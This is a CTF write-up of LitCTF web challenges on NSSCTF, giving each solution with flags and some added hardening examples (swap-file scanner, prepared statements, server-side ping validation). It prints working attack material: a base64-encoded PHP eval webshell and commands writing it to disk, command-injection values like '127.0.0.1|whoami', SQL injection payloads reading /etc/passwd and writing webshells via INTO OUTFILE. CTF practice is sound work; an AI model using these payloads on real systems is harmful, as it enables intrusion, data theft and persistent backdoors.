4. LitCTF NSSCTF WEB Track (Partial) WriteUp

qwsn 2024-06-17 10:19:33

0x01. Where's My FLAG? [source code information leak + JS information leak]

The page source contains the flag: <!--flag is here flag=NSSCTF{8f83d19f-09d7-43da-8ff7-9fdde5dbcac1} -->

Easter egg hunt: found an empty flag.php file

┌──(root㉿kali)-[~/dirsearch]
└─# python dirsearch.py -u http://node5.anna.nssctf.cn:28919/

|. _ _ _ _ _ | v0.4.3
(
||| ) (/(|| (| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11710

Output: /root/dirsearch/reports/http_node5.anna.nssctf.cn_28919/__23-05-13_23-38-17.txt

Target: http://node5.anna.nssctf.cn:28919/

[23:38:17] Starting:
[23:38:55] 301 - 169B - /assets -> http://node5.anna.nssctf.cn/assets/
[23:38:55] 403 - 555B - /assets/
[23:39:16] 200 - 0B - /flag.php

Task Completed

The page source references http://node6.anna.nssctf.cn:28980/assets/js/script.min.js, which contains:

Function.prototype.getMultiLine = function () {
    var lines = new String(this);
    lines = lines.substring(lines.indexOf("/*") + 3, lines.lastIndexOf("*/"));
    return lines;
  }
  var string = function () {
  
    /* 欸~什么!你看到我了么!
    
    恭喜你发现了彩蛋哦~
    ______  __             _  _______   _______  _            _  __ ____          _ 
   |  ____|/_ |           | ||__   __| |__   __|| |          | |/ /|___         | |
   | |__    | | _ __  ___ | |_  | |  ___  | |   | |__    ___ | ' /   __) | _   _ | |
   |  __|   | || '__|/ __|| __| | | / _  | |   | '_   / _ |  <   |__ < | | | || |
   | |      | || |   \__ | |_  | || (_) || |   | | | ||  __/| .   ___) || |_| ||_|
   |_|      |_||_|   |___/ \__| |_| \___/ |_|   |_| |_| \___||_|\_|____/  \__, |(_)
                                                                            __/ |   
                                                                           |___/    
    try to run giveMeEgg() to get the egg!good luck~ 
    wink wink~
    */
  }

Opening the console shows the same message:

欸~什么!你看到我了么!
    
    恭喜你发现了彩蛋哦~
    ______  __             _  _______   _______  _            _  __ ____          _ 
   |  ____|/_ |           | ||__   __| |__   __|| |          | |/ /|___         | |
   | |__    | | _ __  ___ | |_  | |  ___  | |   | |__    ___ | ' /   __) | _   _ | |
   |  __|   | || '__|/ __|| __| | | / _  | |   | '_   / _ |  <   |__ < | | | || |
   | |      | || |   \__ | |_  | || (_) || |   | | | ||  __/| .   ___) || |_| ||_|
   |_|      |_||_|   |___/ \__| |_| \___/ |_|   |_| |_| \___||_|\_|____/  \__, |(_)
                                                                            __/ |   
                                                                           |___/    
    try to run giveMeEgg() to get the egg!good luck~ 
    wink wink~

Run in the console: giveMeEgg()
giveMeEgg()
script.min.js:49 LitCTF{First_t0_The_k3y! (1/?)
script.min.js:50 多留意一下哦~ 说不定就找到下一个了呢~

This gives the first Easter egg:
LitCTF{First_t0_The_k3y! (1/?)

0x02. Missile Trail [JS information leak]

Viewing the source, we find a JS folder: http://node5.anna.nssctf.cn:28482/src/game.js

Inside it we find: F|L|A|G {y0u_w1n_th1s_!!!}
text: function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},

So the flag is: F|L|A|G {y0u_w1n_th1s_!!!}
Note: the submission format is NSSCTF{y0u_w1n_th1s_!!!}

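0x03. Follow me and hack me [HackBar + Burp + backup file]

Use HackBar to pass in the GET and POST data and click Execute, capture the request with Burp at the same time, then resend it to get the flag:
NSSCTF{6ebfbb4f-856b-4941-adac-a20c85ce1d99}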
POC:
POST /?CTF=Lit2023 HTTP/1.1
Host: node6.anna.nssctf.cn:28285
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://node6.anna.nssctf.cn:28285
Connection: close
Referer: http://node6.anna.nssctf.cn:28285/?CTF=Lit2023
Upgrade-Insecure-Requests: 1

Challenge=i%27m_c0m1ng

Easter egg hunt: a 0B flag.php, plus a www.zip
┌──(root㉿kali)-[~/dirsearch]
└─# python dirsearch.py -u node6.anna.nssctf.cn:28465

|. _ _ _ _ _ | v0.4.3
(
||| ) (/(|| (| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11710

Output: /root/dirsearch/reports/_node6.anna.nssctf.cn_28465/_23-05-13_23-44-10.txt

Target: http://node6.anna.nssctf.cn:28465/

[23:44:10] Starting:
[23:45:11] 200 - 0B - /flag.php
[23:46:05] 200 - 881B - /www.zip

Task Completed

Extracted from www.zip:
<?php // The third Easter egg! (Have you seen Ready Player One?) // _R3ady_Pl4yer_000ne_ (3/?) ?>

0x04. PHP Is the Best Language in the World!! [code execution, getshell]

system('ls');
system('pwd');
system('find / -name flag*');
system('cat /flag');
//POWERFUL PHP TOOL
flag=NSSCTF{43fc5c29-e6b5-44f7-92d6-b2bef957a27c}

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==

echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >cc.php

system('echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >cc.php');

Connect with AntSword: http://node5.anna.nssctf.cn:28517/cc.php

Output of system('find / -name flag*');:
/sys/devices/pnp0/00:04/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS15/flags /sys/devices/platform/serial8250/tty/ttyS6/flags /sys/devices/platform/serial8250/tty/ttyS23/flags /sys/devices/platform/serial8250/tty/ttyS13/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /sys/devices/platform/serial8250/tty/ttyS4/flags /sys/devices/platform/serial8250/tty/ttyS21/flags /sys/devices/platform/serial8250/tty/ttyS11/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS28/flags /sys/devices/platform/serial8250/tty/ttyS18/flags /sys/devices/platform/serial8250/tty/ttyS9/flags /sys/devices/platform/serial8250/tty/ttyS26/flags /sys/devices/platform/serial8250/tty/ttyS16/flags /sys/devices/platform/serial8250/tty/ttyS7/flags /sys/devices/platform/serial8250/tty/ttyS24/flags /sys/devices/platform/serial8250/tty/ttyS14/flags /sys/devices/platform/serial8250/tty/ttyS5/flags /sys/devices/platform/serial8250/tty/ttyS22/flags /sys/devices/platform/serial8250/tty/ttyS12/flags /sys/devices/platform/serial8250/tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS20/flags /sys/devices/platform/serial8250/tty/ttyS10/flags /sys/devices/platform/serial8250/tty/ttyS29/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS19/flags /sys/devices/platform/serial8250/tty/ttyS27/flags /sys/devices/platform/serial8250/tty/ttyS17/flags /sys/devices/platform/serial8250/tty/ttyS8/flags /sys/devices/platform/serial8250/tty/ttyS25/flags /sys/devices/virtual/net/eth0/flags /sys/devices/virtual/net/eth1/flags /sys/devices/virtual/net/lo/flags /proc/sys/kernel/sched_domain/cpu0/domain0/flags /proc/sys/kernel/sched_domain/cpu0/domain1/flags /proc/sys/kernel/sched_domain/cpu1/domain0/flags /proc/sys/kernel/sched_domain/cpu1/domain1/flags /proc/sys/kernel/sched_domain/cpu2/domain0/flags /proc/sys/kernel/sched_domain/cpu2/domain1/flags 
/proc/sys/kernel/sched_domain/cpu3/domain0/flags /proc/sys/kernel/sched_domain/cpu3/domain1/flags /proc/sys/kernel/sched_domain/cpu4/domain0/flags /proc/sys/kernel/sched_domain/cpu4/domain1/flags /proc/sys/kernel/sched_domain/cpu5/domain0/flags /proc/sys/kernel/sched_domain/cpu5/domain1/flags /proc/sys/kernel/sched_domain/cpu6/domain0/flags /proc/sys/kernel/sched_domain/cpu6/domain1/flags /proc/sys/kernel/sched_domain/cpu7/domain0/flags /proc/sys/kernel/sched_domain/cpu7/domain1/flags /flag

0x05. Vim yyds [command execution, getshell]

Visit .index.php.swp and download it.

Recover the file:
vim -r .index.php.swp
or vi -r .index.php.swp

The recovered content is:

<html>
<head>
    <meta charset="UTF-8">
    <style type="text/css">
        body,
        html {
            display: flex;
            align-items: center;
            justify-content: center;
        }

        div.vim {
            display: flex;
            align-content: center;
            vertical-align: middle;
            justify-content: center;
        }

        img {
            border: none;
            width: 8rem;
            height: auto;
        }

        h1.vim_yyds {
            color: #50f728;
            display: flex;
            align-items: flex-start;
            justify-content: center;
            margin-top: 50;
            margin-left: 5px;
        }

        h3.vim_said {
            color: #39c2ff;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        br,
        p {
            font-size: 20;
        }
    </style>
</head>

<body>
    <main>
        <div class="vim">
            <img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img>
            <h1 class="vim_yyds">
                Vim yyds
            </h1>
        </div>
        <h3 class="vim_said">
            队里师傅说Vim是世界上最好的编辑器,不接受反驳
        </h3>
        <div class="can_can_vim">
            <?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base64_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>
        </div>
    </main>
</body>

The key part:

<?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base64_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>

Give_Me_Your_Flag
Base64-encoded: R2l2ZV9NZV9Zb3VyX0ZsYWc=
Send via POST:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
NSSCTF{1c21591c-7690-47ee-8426-54f79824f06d}

Write a webshell:

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==

echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >cc.php

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >cc.php

Connect with AntSword: http://node6.anna.nssctf.cn:28554/cc.php (password: cc)
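
The www.zip in 0x03 and the .index.php.swp here are both leftover files served straight from the web root. The following pre-deploy scan is an added example, not code from the challenge; the pattern list and the sample directory tree are assumptions constructed for illustration.

```php
<?php
// Added example: scan a web root for editor swap files and backup archives
// before deployment. Patterns are assumptions chosen to cover the file kinds
// seen in this write-up (.index.php.swp, www.zip) plus common siblings.
const LEFTOVER_PATTERNS = [
    'vim swap file'  => '/^\..+\.sw[a-p]$/',
    'backup archive' => '/\.(zip|tar|tar\.gz|tgz|rar|7z)$/i',
    'editor backup'  => '/(~|\.bak|\.old|\.orig)$/i',
];

function find_leftovers(string $root): array
{
    $hits = [];
    // SKIP_DOTS only drops "." and ".."; hidden files are still visited.
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        foreach (LEFTOVER_PATTERNS as $kind => $regex) {
            if (preg_match($regex, $file->getFilename())) {
                // Report the path relative to the web root.
                $hits[] = [$kind, substr($file->getPathname(), strlen($root) + 1)];
                break;
            }
        }
    }
    sort($hits);
    return $hits;
}

// Constructed sample tree standing in for /var/www/html.
$root = sys_get_temp_dir() . '/webroot_' . bin2hex(random_bytes(4));
mkdir($root . '/assets', 0700, true);
foreach (['index.php', '.index.php.swp', 'www.zip', 'assets/app.js'] as $name) {
    file_put_contents("$root/$name", '');
}

$hits = find_leftovers($root);
foreach ($hits as [$kind, $path]) {
    echo "$kind: $path\n";
}
echo count($hits), " file(s) must be removed before this tree is published\n";
```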

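0x06. Homework Management System [file creation, getshell]

Log in with admin/admin
Create a file: cc.php

<?php eval($_POST['cc']);?>

Connect with AntSword to find the flag in the root directory
flag=NSSCTF{959f0158-c22a-471b-8926-879171fae14c}

Easter egg hunt:
The remote download feature has a default link, https://github.com/ProbiusOfficial/My_pic/blob/main/demo.jpg; visiting it reveals the second Easter egg
wow, you found the second Easter egg~
_S0_ne3t? (2/?)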

0x07. Inject It Hard [SQL injection, getshell]

?id=-1)))))) union select schema_name,2 from information_schema.schemata%23
Array ( [0] => Array ( [username] => information_schema [password] => 2 )
[1] => Array ( [username] => mysql [password] => 2 )
[2] => Array ( [username] => ctftraining [password] => 2 )
[3] => Array ( [username] => performance_schema [password] => 2 )
[4] => Array ( [username] => test [password] => 2 )
[5] => Array ( [username] => ctf [password] => 2 ) )

?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctf'%23
//users

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctf'%23
// id,username,password

?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1tanjiOHHHHHHH,2fake_flagF1rst_to_Th3_eggggggggg!}
// fake flag

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='flag' and table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='news' and table_schema='ctftraining'%23
//id,title,content,time

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctftraining'%23
//id,username,password,ip,time

?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema='ctftraining'%23
//0 results

?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema='ctftraining'%23
//0 results

?id=-1)))))) union select flag,2 from flag where table_schema='ctftraining'%23
//0 results

How can it be empty????
It is probably a problem with the statement, so we just run sqlmap directly:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D "ctftraining" -T flag -C flag --dump
//NSSCTF{b029dc6f-0160-4b1e-b2c1-4aeb301dc3e2}

After testing, it turns out that table_schema is only a column of the built-in database (information_schema); to query a specific database here we should use the database_name.table_name form:
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{d999de63-d796-4151-b10e-c77cbc87ab64}

Easter egg hunt:
The fake flag found earlier appears to be the last Easter egg:
F1rst_to_Th3_eggggggggg!}

?id=-1)))))) union select load_file('/etc/passwd'),2%23
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,:/home/www-data:/sbin/nologin
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin

?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23
Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ .php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } } [password] => 2 ) )

?id=-1)))))) union select load_file('/var/www/html/index.php'),2%23

Array
(
    [0] => Array
        (
            [username] => <?php
    error_reporting(0);
  include "connect.php";
?>
<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>狠狠的注入涅~</title>
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet"
        href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic&amp;display=swap">
</head>

<body>
    <header class="text-center text-white masthead"
        style="background:url('https://www.dmoe.cc/random.php')no-repeat center center;background-size:cover;">
        <div class="overlay"></div>
        <div class="container">
            <div class="row">
                <div class="col-xl-9 mx-auto position-relative">
                    <h1 class="mb-5">Search what you want to search</h1>
                </div>
                <div class="col-md-10 col-lg-8 col-xl-7 mx-auto position-relative">
                    <form method="get" action="">
                        <div class="row">
                            <div class="col-12 col-md-9 mb-2 mb-md-0">
                                <input class="form-control form-control-lg" type="text" name="id"
                                    placeholder="Enter your id to start">
                            </div>
                            <div class="col-12 col-md-3">
                                <button class="btn btn-primary btn-lg" type="submit">姨妈大!</button>
                            </div>
                        </div>
                    </form>

                </div>
            </div>
        </div>
    </header>
    


<section class="text-center bg-light features-icons">
    <div class="container">
        <div class="row">
            <div class="col-md-6"> 
                <h5>Key Source</h5>
                <pre><?php highlight_file(source) ?></pre>
            </div>
            <div class="col-md-6"> 
                <?php
                
                $sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
                echo "<h5>Executed Operations:</h5>"
                    .$sql
                    ."<br><br>";
                $result = $conn->query($sql);
                if ($result->num_rows > 0) {
                        print_r(mysqli_fetch_all($result, MYSQLI_ASSOC));
                } else {
                    echo "0 results";
                }
                ?>
            </div>
        </div>
    </div>
</section>



    <section class="showcase">
        <div class="container-fluid p-0">
            <div class="row g-0"></div>
        </div>
    </section>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
</body>

</html>



            [password] => 2
        )

)
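
The dumped index.php builds its query by concatenating $_GET["id"] into the SQL text, which is why closing the six parentheses and appending a UNION works. The following hardened form is an added example, not the challenge's code; it assumes connect.php provides a mysqli object in $conn (with the mysqlnd driver for get_result), and the account name in the final comment is a placeholder.

```php
<?php
// Added example: the lookup from index.php rewritten with a bound parameter.
// Assumption: connect.php defines $conn as a mysqli connection.
error_reporting(0);
include "connect.php";

// Vulnerable original, for comparison:
//   $sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
//   $result = $conn->query($sql);

// 1. Validate: id must be an integer. A value such as
//    "-1)))))) union select ..." fails this filter and never reaches the DB.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === null || $id === false) {
    http_response_code(400);
    exit('id must be an integer');
}

// 2. Bind: the value is sent separately from the SQL text, so it cannot
//    close the parentheses or append another SELECT.
$stmt = $conn->prepare('SELECT username, password FROM users WHERE id = ?');
$stmt->bind_param('i', $id);
$stmt->execute();
$rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);

// 3. Output: escape values and do not echo the SQL statement to the client.
if ($rows) {
    foreach ($rows as $row) {
        echo htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8'), '<br>';
    }
} else {
    echo '0 results';
}

// 4. Database side: load_file() and INTO OUTFILE both need the FILE
//    privilege. The account below is a placeholder name:
//      REVOKE FILE ON *.* FROM 'webapp'@'localhost';
//    Setting secure_file_priv to NULL, or to a directory outside the web
//    root, also stops files being written under /var/www/html.
```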

?id=-1)))))) union select '<?php phpinfo();?>',2 into outfile '/var/www/html/info.php'%23
http://node6.anna.nssctf.cn:28413/info.php

?id=-1)))))) union select '<?php eval($_POST["cc"]);?>',2 into outfile '/var/www/html/cc.php'%23
http://node6.anna.nssctf.cn:28413/cc.php

0x08. Http pro max plus [HTTP request headers]

1. Capture the request with Burp: add and modify HTTP request headers
User-Agent: Chrome
Client-IP: 127.0.0.1
Referer: pornhub.com
Via: Clash.win

Response: Let's step aside and talk —>> /wtfwtfwtfwtf.php

2. The PoC is as follows:
GET / HTTP/1.1
Host: node5.anna.nssctf.cn:28402
User-Agent: Chrome
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Client-IP: 127.0.0.1
Referer: pornhub.com
Via: Clash.win

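3. Visit the /wtfwtfwtfwtf.php page
The response talks about how to get us connected to the external network, but the source of the current page actually contains something:

<!-- Go ahead and binge; bingeing on everything will only hurt you. bdy, the good stuff is at /sejishikong.php -->

4. Visit the /sejishikong.php page to get the flag
All done? Take your flag and get going NSSCTF{78272e23-99df-46ec-9949-74abf0a971dd}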

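0x09. Ping [command execution, getshell]

The front end enforces restrictions. As is well known, front-end restrictions exist only so that front-end users enter valid data, which reduces back-end overhead and lets it process the data better.
Front-end restrictions are therefore not a security control. Here we capture the request with Burp Suite and send it to the Repeater module:

command=127.0.0.1|whoami&ping=Ping
// returns www-data

command=127.0.0.x||find / -name flag*&ping=Ping
// returns: /flag

command=127.0.0.x||cat /flag&ping=Ping
// returns: flag=NSSCTF{e3c1168b-4204-4875-a84b-bacdca94b744}

Write a webshell:

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==
echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >cc.php

command=127.0.0.x||echo "PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==" | base64 -d >cc.php&ping=Ping

Connect with AntSword: http://node6.anna.nssctf.cn:28236/cc.php (password: cc)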
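
The point made at the start of this section, that the check has to live on the server, looks like this in practice. This is an added example, not the challenge's back end (which the write-up never shows); the vulnerable form in the first comment is an assumption, and only the POST field name command comes from the requests above.

```php
<?php
// Added example: server-side handling of the "command" POST field.
// Assumed vulnerable form (the real back end is not shown on this page):
//   shell_exec('ping -c 1 ' . $_POST['command']);
// There the shell interprets "|" and "||" inside the posted value.

function ping_host(string $input): array
{
    // Only a literal IPv4/IPv6 address passes. Values such as
    // "127.0.0.1|whoami" or "127.0.0.x||cat /flag" are rejected.
    $ip = filter_var(trim($input), FILTER_VALIDATE_IP);
    if ($ip === false) {
        return ['ok' => false, 'output' => 'invalid address'];
    }

    // The array form of proc_open (PHP >= 7.4) starts ping directly,
    // without a shell, so the argument is never parsed for metacharacters.
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['ping', '-c', '1', '-W', '2', $ip], $spec, $pipes);
    if (!is_resource($proc)) {
        return ['ok' => false, 'output' => 'ping unavailable'];
    }
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $status = proc_close($proc);

    return ['ok' => $status === 0, 'output' => $output];
}

// Handler: a non-string value (command[]=...) is treated as empty input.
$raw = $_POST['command'] ?? '';
$result = ping_host(is_string($raw) ? $raw : '');
if ($result['output'] === 'invalid address') {
    http_response_code(400);
}
// Escape whatever is echoed back to the browser.
echo '<pre>', htmlspecialchars($result['output'], ENT_QUOTES, 'UTF-8'), '</pre>';
```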

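0x0a. 1zjs [JS information leak]

After viewing the source, we see the page uses the JS file http://node6.anna.nssctf.cn:28119/dist/index.umd.js

A comment in it reveals: /f@k3f1ag.php
PERFORMANCE OF THIS SOFTWARE.Your gift just take it : /f@k3f1ag.php

Visit /f@k3f1ag.php, which returns a JSFuck-encoded payload.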

Online decoder: http://www.hiencode.com/
Select JSFuck and decode it to get: NSSCTF{4[]b0[]8[]5[]0[]1[]6[]-8[]ace-4[]1[]0[]7[]-8[]4[]d0[]-1[]da4[]1[]ab1[]0[]8[]ba}

NSSCTF{4b085016-8ace-4107-84d0-1da41ab108ba}

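0x0b. Easter Egg [flag assembled from challenges 1+3+6+7]

Challenge 1:
LitCTF{First_t0_The_k3y! (1/?)

Challenge 3:
<?php // The third Easter egg! (Have you seen Ready Player One?) // _R3ady_Pl4yer_000ne_ (3/?) ?>

Challenge 6:
wow, you found the second Easter egg~
_S0_ne3t? (2/?)

Challenge 7:
This appears to be the last Easter egg
F1rst_to_Th3_eggggggggg!}

Concatenated:
LitCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}

Note: the submission format given by the challenge is NSSCTF{}, so: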
NSSCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}
